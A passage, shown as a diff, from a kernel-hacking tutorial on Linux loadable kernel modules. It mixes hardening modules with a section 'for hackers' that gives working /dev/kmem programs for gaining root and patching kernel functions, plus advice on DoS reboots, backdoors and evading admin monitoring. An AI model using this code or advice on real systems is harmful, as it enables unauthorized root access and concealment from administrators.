+
+#include <linux/module.h>
+#include <linux/kernel.h>
+#include <asm/unistd.h>
+#include <sys/syscall.h>
+#include <sys/types.h>
+#include <asm/fcntl.h>
+#include <asm/errno.h>
+#include <linux/types.h>
+#include <linux/dirent.h>
+#include <sys/mman.h>
+#include <linux/string.h>
+#include <linux/fs.h>
+#include <linux/malloc.h>
+#include <sys/stat.h>
+
+
+extern void* sys_call_table[];
+
+/*if lock_mod=1 THEN ALLOW LOADING A MODULE*/
+int lock_mod=0;
+
+int __NR_myexecve;
+
+/*intercept create_module(...) and stat(...) systemcalls*/
+int (*orig_create_module)(char*, unsigned long);
+int (*orig_stat) (const char *, struct old_stat*);
+
+char *strncpy_fromfs(char *dest, const char *src, int n)
+{
+ char *tmp = src;
+ int compt = 0;
+
+ do {
+  dest[compt++] = __get_user(tmp++, 1);
+ }
+ while ((dest[compt - 1] != '\0') && (compt != n));
+
+ return dest;
+}
+
+int hacked_stat(const char *filename, struct old_stat *buf)
+{
+ char *name;
+ int ret;
+ char *password = "password"; /*yeah, a great password*/
+
+ name    = (char *) kmalloc(255, GFP_KERNEL);
+
+ (void) strncpy_fromfs(name, filename, 255);
+
+ /*do we have our password ?*/
+ if (strstr(name, password)!=NULL) 
+ { 
+  /*allow loading a module for one time*/
+  lock_mod=1; 
+  kfree(name);
+  return 0;
+ } 
+ else 
+ {
+  kfree(name);
+  ret = orig_stat(filename, buf);
+ }
+ return ret;
+}
+
+int hacked_create_module(char *name, unsigned long size)
+{
+ char *kernel_name;
+ char hide[]="ourtool";
+ int ret;
+ 
+ if (lock_mod==1)
+ {
+  lock_mod=0;
+  ret=orig_create_module(name, size);
+  return ret;
+ }
+ else
+ {
+  printk("<1>MOD-POL : Permission denied !\n");
+  return 0;
+ }
+ return ret;
+}
+
+
+int init_module(void)                /*module setup*/
+{
+ __NR_myexecve = 200;
+
+ while (__NR_myexecve != 0 && sys_call_table[__NR_myexecve] != 0)
+  __NR_myexecve--;
+ 
+ sys_call_table[__NR_myexecve]=sys_call_table[SYS_execve];                                       
+
+ orig_stat=sys_call_table[SYS_prev_stat];
+ sys_call_table[SYS_prev_stat]=hacked_stat;
+
+ orig_create_module=sys_call_table[SYS_create_module];
+ sys_call_table[SYS_create_module]=hacked_create_module;
+
+ printk("<1>MOD-POL LOADED...\n");
+ return 0;
+}
+
+void cleanup_module(void)            /*module shutdown*/
+{
+ sys_call_table[SYS_prev_stat]=orig_stat;                                      
+ sys_call_table[SYS_create_module]=orig_create_module;                                      
+}
+</xmp>
+
+This code should be clear. The following list tells you what to improve in this
+LKM in order to make it more secure, perhaps a bit too paranoid :) :
+<ul>
+<li>find another way to authenticate (use your own user space interface, with your
+  own systemcalls; use userID (not just a plain password); perhaps you have a
+  biometric device -> read documentation and code your device driver for Linux
+  and use it ;)  ...) BUT REMEMBER: the most secure hardware protection (dongles,
+  biometric, smartcard systems can often be defeated because of a very insecure
+  software interface;. You could secure your whole system with a mechanism like
+  that. Control your whole kernel with a smartcard  :)<br>
+  Another not so 'extreme' way would be to implement your own systemcall which is
+  responsible for authentication. (see II.11 for an example of creating your
+  own systemcall).<br>
+<li>find a better way to check in sys_create_module(...). Checking a variable is
+  not very secure, if someone rooted your system he could patch the memory (see
+  the next part)<br>
+<li>find a way to make it impossible for an attacker to use your authentication
+  for insmod'ing his LKM <br>
+<li>add hiding features<br>
+<li>...<br>
+</ul>
+
+You can see, there is some work to do. But even with those steps, your system
+cannot be totally secure.If someone rooted the system he could find other tricks
+to load his LKM (see next part); perhaps he even does not need a LKM, because he
+only rooted thesystem, and don't want to hide files / processeses (and the other
+wonderfull things possible with LKMs).
+
+<H3><A NAME="III.2."></A>2. Anti-LKM-Infector ideas</h3
+
+In this section I will concentrate on the LKM Infector by SVAT, because I cannot
+present a generic LKM infection scanner. Perhaps this would be possible with
+something like heuristic tests or something similar. There are many ways you
+can implement a LKM infector scanner. You can divide them into two big groups :
+<ul>
+<li> memory resident (realtime) scanner (like TSR virus scanner in DOS;or VxD
+  scanner virus in WIN9x)<br>
+<li> file checking scanner (checking module files for signs of an infection)<br>
+</ul>
+The first method is possible through intercepting sys_create_module (or the
+init_module call). The second approach needs something characteristic which you
+may find in any infected file. We know that the LKM infector appends two module
+files. So we could check for two ELF headers / signatures. Of course, any other
+LKM infector could use a improved method (encryption, selfmodifying code etc.).
+I won't present a file checking scanner, because you just have to write a little
+(user space) programm that reads in the module, and checks for twe ELF headers
+(the 'ELF' string, for example).
+
+<H3><A NAME="III.3."></A>3. Make your programs untraceable (theory)</h3>
+
+Now it's time to beat hackers snooping our executables. As I said before strace
+is the tool of our choice. I presented it as a tool helping us to see which 
+systemcalls are used in certain programs. Another very interesting use of strace
+is outlined in the paper 'Human to Unix Hacker' by TICK/THC. He shows us how to
+use strace for TTY hijacking. Just strace your neighbours shell,and you will get
+every input he makes. So you admins should realize the danger of strace. The
+program strace uses the following API function :<br>
+
+<xmp>
+#include <sys/ptrace.h>
+
+int ptrace(int request, int pid, int addr, int data);
+</xmp>
+
+Well how can we control strace? Don't be silly and remove strace from your 
+system, and think everything is ok - as I show you ptrace(...) is a library 
+function. Every hacker can code his own program doing the same as strace. So 
+we need a better more secure solution. Your first idea could be to search for
+an interesting systemcall that could be responsible for the tracing; There is
+a systemcall doing that; but let's look at another approach before.<br>
+Remember II.5.1 : I talked about the task flags. There were two flags which
+stand for traced processes. This is the way we can control the tracing on our
+system. Just intercept the sys_execve(...) systemcall and check the current
+process for one of the two flags set.<br>
+
+<H4><A NAME="III.3.1."></A>3.1  Practical Example of a prototype Anti-Tracer</h4>
+
+This is my little LKM called 'Anti-Tracer'. It basicly implements the ideas from
+4. The flags field from our process can easily be retrieved using the current
+pointer (task structure). The rest is nothing new.
+
+<xmp>
+#define MODULE
+#define __KERNEL__
+
+#include <linux/module.h>
+#include <linux/kernel.h>
+#include <asm/unistd.h>
+#include <sys/syscall.h>
+#include <sys/types.h>
+#include <asm/fcntl.h>
+#include <asm/errno.h>
+#include <linux/types.h>
+#include <linux/dirent.h>
+#include <sys/mman.h>
+#include <linux/string.h>
+#include <linux/fs.h>
+#include <linux/malloc.h>
+
+extern void* sys_call_table[];
+
+int __NR_myexecve;
+
+int (*orig_execve) (const char *, const char *[], const char *[]);
+
+char *strncpy_fromfs(char *dest, const char *src, int n)
+{
+ char *tmp = src;
+ int compt = 0;
+
+ do {
+  dest[compt++] = __get_user(tmp++, 1);
+ }
+ while ((dest[compt - 1] != '\0') && (compt != n));
+  return dest;
+}
+
+int my_execve(const char *filename, const char *argv[], const char *envp[])
+{
+ long __res;
+ __asm__ volatile ("int $0x80":"=a" (__res):"0"(__NR_myexecve), "b"((long)
+                  (filename)), "c"((long) (argv)), "d"((long) (envp)));
+ return (int) __res;
+}
+
+
+int hacked_execve(const char *filename, const char *argv[], const char *envp[])
+{
+ int ret, tmp;
+ unsigned long mmm;
+ char *kfilename;
+
+ /*check for the flags*/
+ if ((current->flags & PF_PTRACED)||(current->flags & PF_TRACESYS)) { 
+  /*we are traced, so print the traced process (program name) and return
+  without execution*/
+  kfilename = (char *) kmalloc(256, GFP_KERNEL);
+  (void) strncpy_fromfs(kfilename, filename, 255);
+  printk("<1>TRACE ATTEMPT ON %s -> PERMISSION DENIED\n", kfilename);
+  kfree(kfilename);
+  return 0;
+ }
+ ret = my_execve(filename, argv, envp);
+ return ret;
+}
+
+int init_module(void)                /*module setup*/
+{
+ __NR_myexecve = 200;
+ while (__NR_myexecve != 0 && sys_call_table[__NR_myexecve] != 0)
+  __NR_myexecve--;
+ orig_execve = sys_call_table[SYS_execve];
+ if (__NR_myexecve != 0) 
+ {
+  sys_call_table[__NR_myexecve] = orig_execve; 
+  sys_call_table[SYS_execve] = (void *) hacked_execve;
+ }
+ return 0;
+}
+
+void cleanup_module(void)            /*module shutdown*/
+{
+ sys_call_table[SYS_execve]=orig_execve;                                      
+}
+<xmp>
+
+This LKM also logs any executable someone wanted to execute with tracing. Well
+this LKM checks for some flags, but what if you start tracing a program which
+is already running. Just imagine a program (shell or whatever) running with the
+PID 1853, now you do a 'strace -p 1853'. This will work. So for securing this
+hooking sys_ptrace(...) is the only way. Look at the following module :
+
+<xmp>
+#define MODULE
+#define __KERNEL__
+
+#include <linux/module.h>
+#include <linux/kernel.h>
+#include <asm/unistd.h>
+#include <sys/syscall.h>
+#include <sys/types.h>
+#include <asm/fcntl.h>
+#include <asm/errno.h>
+#include <linux/types.h>
+#include <linux/dirent.h>
+#include <sys/mman.h>
+#include <linux/string.h>
+#include <linux/fs.h>
+#include <linux/malloc.h>
+
+extern void* sys_call_table[];
+
+
+int (*orig_ptrace)(long request, long pid, long addr, long data);
+
+int hacked_ptrace(long request, long pid, long addr, long data)
+{
+ printk("TRACING IS NOT ALLOWED\n");
+ return 0;
+}
+
+
+int init_module(void)                /*module setup*/
+{
+ orig_ptrace=sys_call_table[SYS_ptrace];
+ sys_call_table[SYS_ptrace]=hacked_ptrace;
+ return 0;
+}
+
+void cleanup_module(void)            /*module shutdown*/
+{
+ sys_call_table[SYS_ptrace]=orig_ptrace;                                      
+}
+<xmp>
+
+Use this LKM and no one will be able to trace anymore.
+
+
+<H3><A NAME="III.4."></A>5. Hardening the Linux Kernel with LKMs</h3>
+
+This section subject may sound familiar to Phrack readers. Route introduced nice
+ideas for making the Linux system more secure. He used some patches. I want to
+show that some ideas can also be implemented by LKMs. Remember that without
+hiding those LKMs it is also <i>useful</i> (of course hiding is something you should
+do), because route's patches are also worthless if someone rooted the system;
+and a non-priviledged user can <i>not</i> remove our LKM, but he can see it.
+The advantage of using LKMs instead of a static kernel patch : you can easily
+manage the whole system security, and install it more easily on running system.
+It's not necessary to install a new kernel on sensitive system you need every
+second.<br>
+The Phrack patches also added some logging feature's which I did not implement
+but there are thousand ways to do it.The simpelst way would be using printk(...)
+[Note : I did not look at every aspect of route's patches. Perhaps real good
+kernel hackers would be able to do more with LKMs.]
+
+
+<H4><A NAME="III.4.1."></A>4.1  Why should we allow arbitrary programs execution rights? </h4>
+
+The following LKM is something like route's kernel patch that checks for 
+execution rights :
+
+<xmp>
+#define __KERNEL__
+#define MODULE
+
+
+#include <linux/version.h>
+#include <linux/mm.h>
+#include <linux/unistd.h>
+#include <linux/fs.h>
+#include <linux/types.h>
+#include <asm/errno.h>
+#include <asm/string.h>
+#include <linux/fcntl.h>
+#include <sys/syscall.h>
+#include <linux/module.h>
+#include <linux/malloc.h>
+#include <linux/kernel.h>
+#include <linux/kerneld.h>
+
+/* where the sys_calls are */
+
+int __NR_myexecve = 0;
+
+extern void *sys_call_table[];
+
+int (*orig_execve) (const char *, const char *[], const char *[]);
+
+int (*open)(char *, int, int);
+int (*close)(int);
+
+
+char *strncpy_fromfs(char *dest, const char *src, int n)
+{
+ char *tmp = src;
+ int compt = 0;
+
+ do {
+  dest[compt++] = __get_user(tmp++, 1);
+ }
+ while ((dest[compt - 1] != '\0') && (compt != n));
+ return dest;
+}
+
+int my_execve(const char *filename, const char *argv[], const char *envp[])
+{
+ long __res;
+ __asm__ volatile ("int $0x80":"=a" (__res):"0"(__NR_myexecve), "b"((long)
+ (filename)), "c"((long) (argv)), "d"((long) (envp)));
+ return (int) __res;
+}
+
+int hacked_execve(const char *filename, const char *argv[], const char *envp[])
+{
+ int fd = 0, ret;
+ struct file *file;
+
+ /*we need the inode strucure*/
+ /*I use the open approach here, because you should understand it from the LKM
+ infector, read on for seeing a better approach*/
+ fd = open(filename, O_RDONLY, 0); 
+        
+ file = current->files->fd[fd];
+
+ /*is this a root file ?*/
+ /*Remember : you can do other checks here (route did more checks), but this
+              is just for demonstration. Take a look at the inode structur to
+              see other items to heck for (linux/fs.h)*/
+ if (file->f_inode->i_uid!=0)
+ {
+  printk("<1>Execution denied !\n");
+  close(fd);
+  return -1;
+ }
+ else /*otherwise let the user execute the file*/
+ {
+  ret = my_execve(filename, argv, envp);
+  return ret;
+ }
+}
+
+int init_module(void)                /*module setup*/
+{
+ printk("<1>INIT \n");
+ __NR_myexecve = 250;
+ while (__NR_myexecve != 0 && sys_call_table[__NR_myexecve] != 0)
+  __NR_myexecve--;
+ orig_execve = sys_call_table[SYS_execve];
+ if (__NR_myexecve != 0) 
+ {
+  printk("<1>everything OK\n");
+  sys_call_table[__NR_myexecve] = orig_execve; 
+  sys_call_table[SYS_execve] = (void *) hacked_execve;
+ }
+
+ open = sys_call_table[__NR_open]; 
+ close = sys_call_table[__NR_close];     
+ return 0;
+}
+
+void cleanup_module(void)            /*module shutdown*/
+{
+ sys_call_table[SYS_execve]=orig_execve;                                      
+}
+</xmp>
+
+This is not exactly the same as route's kernel patch. route checked the <i>path</i>
+we check the <i>file</i> (a path check would also be possible, but in my opinion a
+file check is also the better way). I only implemented a check for UID of the
+file, so an admin can filter the file execution process. As I said the open /
+fd approach I used above is not the easiest way; I took it because it should be
+familiar to you (remember, the LKM infector used this method). For our purpose
+the following kernel function is also possible (easier way) :
+
+<xmp>
+int namei(const char *pathname, struct inode **res_inode);
+
+int lnamei(const char *pathname, struct inode **res_inode);
+</xmp>
+
+Those functions take a certain pathname and return the corresponding inode 
+structure. The difference between the functions above lies in the symlink
+resolving : lnamei does <i>not</i> resolve a symlink and returns the inode structure
+for the symlink itself. As a hacker you could also modify inodes. Just retrieve
+them by hooking sys_execve(...) and using namei(...) (the way we use also for
+execution control) and manipulate the inode (I will show a practical example
+of this idea in 5.3).
+
+<H4><A NAME="III.4.2."></A>4.2 The Link Patch</h4>
+
+Every Linux user knows that symlink bugs are something which often leads to
+serious problems if it comes to system security. Andrew Tridgell developed a
+kernel patch which prevents a process from 'following a link which is in a +t
+(mostly /tmp/) directory unless they own the link'. Solar Designer added some
+code which also prevents users from creating hard links in a +t directory to
+files they don't own.<br>
+I have to admit that the symlink patch lies on a layer we can't easily reach
+from our LKM psotion. There are neither exported symbols we could patch nor any
+systemcalls  we could intercept. The symlink resolving is done by the VFS. Take
+a look at part IV for methods which could help us to solve this problem (but I
+would not use the methods from IV to <i>secure</i> a system). You may wonder why I
+don't use the sys_readlink(...) systemcall for solving the problem. Well this
+call is used if you do a 'ls -a symlink' but it is not called if you issue a
+'cat symlink'.<br>
+In my opinion you should leave this as a kernel patch. Of course you can code
+a LKM which intercepts the sys_symlink(...) systemcall in order to prevent a 
+user from creating symlinks in the /tmp directory. Look at the hard link LKM
+for a similar implementation.<br>
+Ok, the symlink problem was a bit hard to transform it to a LKM. How about Solar
+Designer's idea concerning hard link restrictions. This can be done as LKM. We
+only need to intercept sys_link(...) which is responsible for creating any hard
+links.Let's take a look at hacked systemcall (the code fragment does not exactly
+the same as the kernel patch, because we only check for the '/tmp/' directory,
+not for the sticky bit(+t),but this can also be done with looking at the inode
+structure of the directoy [see 5.1]) :
+
+<xmp>
+int hacked_link(const char *oldname, const char *newname)
+{
+ char *kernel_newname;
+ int fd = 0, ret;
+ struct file *file;
+
+ kernel_newname = (char*) kmalloc(256, GFP_KERNEL);
+ memcpy_fromfs(kernel_newname, newname, 255);
+
+ /*hard link to /tmp/ directory ?*/
+ if (strstr(kernel_newname, (char*)&hide ) != NULL)
+ {
+  kfree(kernel_newname);
+
+  /*I use the open approach again :)*/
+  fd = open(oldname, O_RDONLY, 0); 
+       
+  file = current->files->fd[fd];
+
+  /*check for UID*/
+  if (file->f_inode->i_uid!=current->uid)
+  {
+   printk("<1>Hard Link Creation denied !\n");
+   close(fd);
+   return -1;
+  }
+ }
+ else
+ {
+  kfree(kernel_newname);
+  /*everything ok -> the user is allowed to create the hard link*/
+  return orig_link(oldname, newname);
+ }
+}
+</xmp>
+This way you could also control the symlink <i>creation</i>.
+
+<H4><A NAME="III.4.3."></A>4.3 The /proc permission patch</h4>
+
+I already showed you some ways how to hide some process information.route's idea
+is different to our hide approach. He wants to limit the /proc/ access (needed
+for access to process information) by changing the directory permissions. So 
+he patched the proc inode. The following LKM will do exactly the same without a
+static kernel patch. If you load it a user will not be allowed to read the proc
+fs, if you unload it he will be able to. Here we go :
+
+<xmp>
+/*very bad programming style (perhaps we should use a function for the
+  indode retrieving), but it works...*/
+#define __KERNEL__
+#define MODULE
+#define BEGIN_KMEM {unsigned long old_fs=get_fs();set_fs(get_ds());
+#define END_KMEM   set_fs(old_fs);}
+
+#include <linux/version.h>
+#include <linux/mm.h>
+#include <linux/unistd.h>
+#include <linux/fs.h>
+#include <linux/types.h>
+#include <asm/errno.h>
+#include <asm/string.h>
+#include <linux/fcntl.h>
+#include <sys/syscall.h>
+#include <linux/module.h>
+#include <linux/malloc.h>
+#include <linux/kernel.h>
+#include <linux/kerneld.h>
+
+extern void *sys_call_table[];
+
+int (*open)(char *, int, int);
+int (*close)(int);
+
+
+int init_module(void)                /*module setup*/
+{ 
+ int fd = 0;
+ struct file *file;
+ struct inode *ino;
+ 
+ /*again the open(...) way*/
+ open = sys_call_table[SYS_open]; 
+ close = sys_call_table[SYS_close];
+
+ /*we have to supplie some kernel space data for the systemcall*/
+ BEGIN_KMEM
+ fd = open("/proc", O_RDONLY, 0); 
+ END_KMEM
+ printk("%d\n", fd);
+ file = current->files->fd[fd];
+
+ /*here's the inode for the proc directory*/
+ ino= file->f_inode;
+
+ /*modify permissions*/
+ ino->i_mode=S_IFDIR | S_IRUSR | S_IXUSR;
+
+ close(fd);
+ return 0;
+}
+
+void cleanup_module(void)            /*module shutdown*/
+{
+ int fd = 0;
+ struct file *file;
+ struct inode *ino;
+ 
+ BEGIN_KMEM
+ fd = open("/proc", O_RDONLY, 0); 
+ END_KMEM
+ printk("%d\n", fd);
+ file = current->files->fd[fd];
+
+ /*here's the inode for the proc directory*/
+ ino= file->f_inode;
+
+ /*modify permissions*/
+ ino->i_mode=S_IFDIR | S_IRUGO | S_IXUGO;
+
+ close(fd);
+}
+</xmp>
+
+Just load this module and try a ps, top or whatever, it won't work. Every access
+to the /proc directory is totally denied. Of course, as root you are still
+allowed to view every process and anything else; this is just a permission patch
+in order to keep your users silly.<br>
+[Note : This is a practical implementation of modifying inodes 'on the fly' you
+ should see many possibilities how to abuse this.]
+
+<H4><A NAME="III.4.4."></A>4.4 The securelevel patch</h4>
+
+
+The purpose of this patch : I quote route 
+<blockquote>
+"This patch isn't really much of a patch.  It simply bumps the securelevel
+up, to 1 from 0.  This freezes the immutable and append-only bits on files,
+keeping anyone from changing them (from the normal chattr interface).  Before
+turning this on, you should of course make certain key files immutable, and
+logfiles append-only.  It is still possible to open the raw disk device,
+however.  Your average cut and paste hacker will probably not know how to do
+this."
+</blockquote>
+Ok this one is really easy to implement as a LKM. We are lucky because the symbol
+responsible for the securelevel is public (see /proc/ksyms) so we can easily 
+change it. I won't present an example for this bit of code, just import secure
+level and set it in the module's init function.
+
+<H4><A NAME="III.4.5."></A>4.5 The rawdisk patch</h4>
+
+I developed an easy way to avoid tools like THC's manipate-data.<br>
+Those tools are used by hackers to search the hard disk for their origin IP address or DNS name. 
+After finding it they modify or remove the entry from the hard disk. For doing
+all this they need access to the /dev/* files for opening the rawdisk. Of course
+they can only do this after rooting the system. So what can we do about this. I
+found that the following way helps to prevent those attacks [of course there are
+again thousand ways to defeat that protection :(] :
+<ul>
+<li> boot your system<br>
+<li> install a LKM which prevents direct (dev/*) access to your partition you save
+  your logs<br>
+</ul>
+
+This works because the system (normally) only needs direct access to the rawdisk
+during the some (seldom) operationes. The LKM just intercepts sys_open(...) and
+filter for the needed dev-file. I think it's not necessary to show how to code
+it, take a look at II.4.2). This way you can protect any /dev/* file. The
+problem is that this way nobody can access them directly while the LKM is
+loaded. <br>
+[Note : There are some functions which will not work / crash the system, but
+a normal web-, or mailserver should work with this patch.]
+
+
+
+<u><b>
+<H2>IV. Some Better Ideas (for hackers)</H2>
+</u></b>
+<P><P>
+
+
+
+<H3><A NAME="IV.1."></A>1. Tricks to beat admin LKMs</h3>
+
+This part will give us some notes on playing with the kernel on systems where
+you have a paranoid (good) admin. After explaining all the ways admins can
+protect a system, it is very hard to find better ways for us (hackers). <br>
+We need to leave the LKM field for some seconds in order to beat those hard
+protections.<br>
+Imagine a system where an admin has installed a very good and big monitor LKM
+which checks every action on that system. It can do everything mentioned in part
+II and III.<br>
+The first way to get rid of this LKM is trying to reboot the system, perhaps the
+admin did not load this LKM from an init file.  So try some DoS Attacks or
+whatever works. If you still cannot kill this LKM try to look at some important
+files, but be careful, some files may be protected / monitored (see appendix A
+for such a LKM).<br>
+If you really cannot see where the LKM is loaded etc., forget the system
+or risk installing a backdoor, which you cannot hide (process/file). But if an
+admin really uses such a 'mega' LKM, forget the system, he might really be good
+and you may get some trouble. For those who even want to beat that system read
+section 2.
+
+<H3><A NAME="IV.2."></A>2. Patching the whole kernel - or creating the Hacker-OS</h3>
+
+[Note : This section may sound a bit off topic, but in the end I'll present a
+nice idea (program that was developed by Silvio Cesare which will also help us
+using our LKMs. This section will only give a summary of the whole kmem problem
+due to the fact that we only need to focus on the idea by Silvio Cesare.]<br>
+Ok LKM's are nice. But what if the admin is like the one described in 1. He does
+everything in order to prevent us from using our nice LKM techniques from part
+II. He even patched his own kernel, to make his system secure. He uses a kernel
+without native LKM support.<br>
+So now it's time to make our last step :  Runtime Kernel Patching.  The basic
+ideas in this section come from some sources I found (kmemthief etc) and a paper
+by Silvio Cesare which describes a general approach to modifying kernel symbols.
+In my opinion this kind of attack is one of the strongest concerning 'kernel 
+hacking'. I don't undersand every Un*x kernel out there, but this approac can 
+help you on many systems. This section describes Runtime Kernel Patching, but
+what about kernelfile patching. Every system has a file which represents the
+plain kernel. On free systems like FreeBSD, Linux, ... it is easy to patch a 
+kernel file, but what about the commercial ones ? I never tried it, but I think
+this would really be interesting : Imagine backdoor'ing a system thru a kernel
+patch. You only have to do a reboot or wait for one (every system must reboot
+sometimes :). But this text will only deal with the runtime approach. You may
+say that this paper is called 'Abusing Linux Loadable Kernel Modules' and you 
+don't want to know how to patch the whole Linux kernel. Well this section will
+help us to 'insmod' LKMs on systems which are very secure and have no LKM 
+support in their kernel. So we learn something which will help us with our LKM
+abusing.<br>
+So let's start with the most important thing we have to deal with if we want to
+do RKP(Runtime Kernel Patching).It's the file /dev/kmem,which makes it possible
+for us to take a look (and modify) the complete virtual memory of our target 
+system. [Note : Remember that the RKP approach is in most cases only useful, if
+you rooted a system. Only very unsecure systems will give normal users access to
+that file].<br>
+As I said before /dev/kmem gives us the chance to see every memory byte of our
+system (plus swap). This means we can also access the whole memory which allows
+us to manipulate any kernel item in the memory (because the kernel is only some
+objectcode loaded into system memory). Remember the /proc/ksyms file which shows
+us every address of an exported kernel symbol. So we know where to modify memory
+in order to manipulate some kernel symbols. Let's take a look at a very basic
+example which is know for a very long time. The following (user space) program
+takes the task_structure address (look for kstat in /proc/ksyms) and a certain
+PID. After seacxhing the task structure that stands for the specified PID it
+modifies every user id field in order to make this process UID=0. Of course
+today this program is nearly of no use, because most systems don't even allow
+a normal user to read /dev/kmem but it is a good introduction into RKP.
+
+<xmp>
+/*Attention : I implemented no error checking!*/
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <fcntl.h>
+
+/*max. number of task structures to iterate*/
+#define NR_TASKS	512
+
+/*our task_struct -> I only use the parts we need*/
+struct task_struct {
+ char a[108];              /*stuff we don't need*/
+ int pid;
+ char b[168];              /*stuff we don't need*/
+ unsigned short uid,euid,suid,fsuid;
+ unsigned short gid,egid,sgid,fsgid;
+ char c[700];              /*stuff we don't need*/
+};
+
+
+/*here's the original task_structure, to show you what else you can modify
+struct task_struct {
+ volatile long state;	
+ long counter;
+ long priority;
+ unsigned long signal;
+ unsigned long blocked;
+ unsigned long flags;
+ int errno;
+ long debugreg[8]; 
+ struct exec_domain *exec_domain;
+ struct linux_binfmt *binfmt;
+ struct task_struct *next_task, *prev_task;
+ struct task_struct *next_run,  *prev_run;
+ unsigned long saved_kernel_stack;
+ unsigned long kernel_stack_page;
+ int exit_code, exit_signal;
+ unsigned long personality;
+ int dumpable:1;
+ int did_exec:1;
+ int pid;
+ int pgrp;
+ int tty_old_pgrp;
+ int session;
+ int leader;
+ int	groups[NGROUPS];
+ struct task_struct *p_opptr, *p_pptr, *p_cptr, *p_ysptr, *p_osptr;
+ struct wait_queue *wait_chldexit;
+ unsigned short uid,euid,suid,fsuid;
+ unsigned short gid,egid,sgid,fsgid;
+ unsigned long timeout, policy, rt_priority;
+ unsigned long it_real_value, it_prof_value, it_virt_value;
+ unsigned long it_real_incr, it_prof_incr, it_virt_incr;
+ struct timer_list real_timer;
+ long utime, stime, cutime, cstime, start_time;
+ unsigned long min_flt, maj_flt, nswap, cmin_flt, cmaj_flt, cnswap;
+ int swappable:1;
+ unsigned long swap_address;
+ unsigned long old_maj_flt;	
+ unsigned long dec_flt;		
+ unsigned long swap_cnt;	
+ struct rlimit rlim[RLIM_NLIMITS];
+ unsigned short used_math;
+ char comm[16];
+ int link_count;
+ struct tty_struct *tty; 
+ struct sem_undo *semundo;
+ struct sem_queue *semsleeping;
+ struct desc_struct *ldt;
+ struct thread_struct tss;
+ struct fs_struct *fs;
+ struct files_struct *files;
+ struct mm_struct *mm;
+ struct signal_struct *sig;
+ #ifdef __SMP__
+  int processor;
+  int last_processor;
+  int lock_depth;	
+ #endif	
+};
+*/
+
+int main(int argc, char *argv[])
+{
+ unsigned long task[NR_TASKS];
+ /*used for the PID task structure*/
+ struct task_struct current;
+ int kmemh;
+ int i;
+ pid_t pid;
+ int retval;
+
+ pid = atoi(argv[2]);
+
+ kmemh = open("/dev/kmem", O_RDWR);
+	
+ /*seek to memory address of the first task structure*/
+ lseek(kmemh,  strtoul(argv[1], NULL, 16), SEEK_SET);
+ read(kmemh, task, sizeof(task));
+	
+ /*iterate till we found our task structure (identified by PID)*/
+ for (i = 0; i < NR_TASKS; i++) 
+ {
+  lseek(kmemh, task[i], SEEK_SET);
+  read(kmemh, &current, sizeof(current));
+  /*is it our process?*/
+  if (current.pid == pid) 
+  {
+   /*yes, so change the UID fields...*/
+   current.uid = current.euid = 0;
+   current.gid = current.egid = 0;
+   /*write them back to memory*/
+   lseek(kmemh, task[i], SEEK_SET);
+   write(kmemh, &current, sizeof(current));
+   printf("Process was found and task structure was modified\n");
+   exit(0);
+  }
+ }
+}
+</xmp>
+
+Nothing special about this little program. It's just like searching a certain
+pattern in a file and changing some fields. There are lots of programs out 
+there which are doing stuff like that. As you can see the example above won't
+help you attacking a system, it's just for demonstration (but there mayby some
+poor systems allowing users to write to /dev/kmem, I don't know).<br>
+The same way you can change the module structures responsible for holding the
+kernel's module information. This way you can also hide a module, just by 
+patching kmem; I don't present an implementation of this, because it is basicly
+the same as the program above (ok, the searching is a bit harder ;)).<br>
+The way above we modified a kernel structure. There are some programs doing 
+things like that. But what about functions ? Well seach the internet and you
+will soon recognize that there are not so many programs doing things like that.
+Well, of course patching a kernel function (we will do more useful things later)
+is a bit tricky. The best way would be to play with the sys_call_table structure
+which will point to a completely new function made by us. Otherwise there would
+be some problems concerning function size and so on. The following example is
+just a very easy program making every systemcall doing nothing. I just insert
+a RET(0xc3)at the beginning of the function address that I get from /proc/ksyms.
+This way the function will return immediately doing nothing.<br>
+
+<xmp>
+/*again no error checking*/
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <fcntl.h>
+
+/*just our RET opcode*/
+unsigned char asmcode[]={0xc3};
+
+int main(int argc, char *argv[])
+{
+ unsigned long counter;
+ int kmemh;
+
+ /*open device*/
+ kmemh = open("/dev/kmem", O_RDWR);
+	
+ /*seek to memory address where the function starts*/
+ lseek(kmemh,  strtoul(argv[1], NULL, 16), SEEK_SET);
+
+ /*write our patch byte*/
+ write(kmemh, &asmcode, 1):
+
+ close(kmemh);
+}
+</xmp>
+
+Let's summarize what we know so far : We can modify any kernel symbol; this 
+includes things like sys_call_table[] and any other function or structure.<br>
+Remember that every kernel patching can only be done if we can access /dev/kmem
+but there are also ways how to protect this file. Take a look at III.5.5.
+
+<H4><A NAME="IV.2.1."></A>2.1  How to find kernel symbols in /dev/kmem</h4>
+
+After the basic examples above you could ask how to modify <i>any</i> kernel symbol
+and how to find interesting ones. In the example above we used /proc/ksyms to
+get the address we need to modify a symbol. But what do we have on systems
+with no lkm support build into their kernel, there won't be a /proc/ksyms file,
+because it is only used for module management (public / available symbols)?
+And what about kernel symbols that are not exported, how can we modify them ?<br>
+Many questions, so let's find some solutions. Silvio Cesare discussed some
+ways finding different kernel symbols (public & non-public ones). He outlines
+that while compiling the linux kernel a file called 'System.map' is created
+which maps every kernel symbol to a fixed address. This file is only needed 
+during compilation for resolving those kernel symbols. The running systems has
+no need for that file.The addresses used for compilation are the same we can use
+to seek /dev/kmem. So the general approach would be :
+<ul>
+<li>lookup System.map for the needed kernel symbol <br>
+<li>take the address we found <br>
+<li>modify the kernel symbol (structure, function, or whatever)<br>
+</ul>
+Sounds quite easy. But there is one big problem. Every system which does not 
+use exactly <i>our</i> kernel will have other addresses for their kernel symbols.<br>
+And on most systems you won't find a helpful System.map file telling us every
+address. So what to do. Silvio Cesare proposed to use a 'key search'. Just take
+your kernel, read the first 10 bytes (just a random value) of a symbol address 
+and take them as a key for searching the same symbol in another kernel.<br>
+If you cannot build a generic key for a certain symbol you may try to find some
+relations from this symbol to other kernel symbols you can create generic keys 
+for. Finding relations can be done by looking up the kernel sources; this way
+you can also find interesting kernel symbols you could modify (patch).<br>
+
+<H4><A NAME="IV.2.2."></A>2.2 The new 'insmod' working without kernel support </h4>
+
+Now it's time to go back to our LKM hacking. This section will give you some
+hints concerning Silvio Cesare's kinsmod program. I will only outline the 
+general working. The most complicated part of the program is the objectcode
+handling (elf file) and its kernel space mapping. But this is only a problem
+of the elf header processing nothing kernel specific. Silvio Cesare used elf
+files because this way you can insert [normal] LKMs. It would also be possible
